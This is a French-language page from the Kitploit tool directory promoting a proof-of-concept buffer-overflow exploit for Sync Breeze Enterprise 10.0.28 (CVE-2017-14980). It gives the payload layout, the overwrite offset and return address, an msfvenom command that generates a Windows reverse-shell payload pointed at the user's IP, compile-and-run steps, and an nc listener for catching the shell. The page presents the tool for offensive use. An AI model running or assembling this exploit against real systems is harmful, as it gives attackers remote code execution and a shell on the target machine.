Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — Exploit de dépassement de tampon (buffer overflow) de preuve de concept pour Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Envoie une charge utile HTTP POST spécialement conçue pour écraser EIP et exécuter un shellcode x86 personnalisé pour une exécution de code arbitraire. | Kitploit
Outils/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'IntrusionExploitation de Binaires
GitHublipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

CVE-2017-14980_syncbreeze_10.0.28_bof

Exploit de dépassement de tampon (buffer overflow) de preuve de concept pour Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Envoie une charge utile HTTP POST spécialement conçue pour écraser EIP et exécuter un shellcode x86 personnalisé pour une exécution de code arbitraire.

Voir le dépôt
23il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

Ce dépôt contient une preuve de concept d'exploit de débordement de tampon (BOF) pour Sync Breeze Enterprise version 10.0.28, ciblant la vulnérabilité identifiée comme CVE-2017-14980.

Description

La vulnérabilité existe en raison d'une validation incorrecte des entrées lors du traitement du champ password dans une requête POST vers le point de terminaison /login.
Un attaquant peut envoyer une valeur trop longue dans ce champ, ce qui écrase le EIP et permet l'exécution de code arbitraire.

Cet exploit envoie une charge utile soigneusement conçue composée de :

  • 520 octets de remplissage ('A')
  • 4 octets pour écraser le EIP
  • Un NOP sled de 20 octets
  • Un shellcode Windows x86, qui peut être personnalisé pour exécuter des commandes arbitraires

Comment ça fonctionne

  1. L'exploit construit un tampon malveillant contenant le shellcode intégré.
  2. Il envoie une requête HTTP POST au serveur vulnérable avec la charge utile dans le champ .
password
  • En traitant la requête, l'application écrase le pointeur d'instruction (EIP) et exécute le shellcode fourni par l'attaquant.
  • Prérequis

    • Un compilateur C (par exemple, gcc)
    • Un accès réseau à une cible exécutant Sync Breeze Enterprise 10.0.28
    • Ajustement de l'adresse EIP (\x83\x0C\x09\x10) et du shellcode si nécessaire

    Exemple de génération de shellcode avec msfvenom :

    root@kitploit:~
    msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
    
    root@kitploit:~
    gcc exploit.c -o exploit
    ./exploit
    
    
    root@kitploit:~
    nc -nlvp 4444
    
    Télécharger l’outil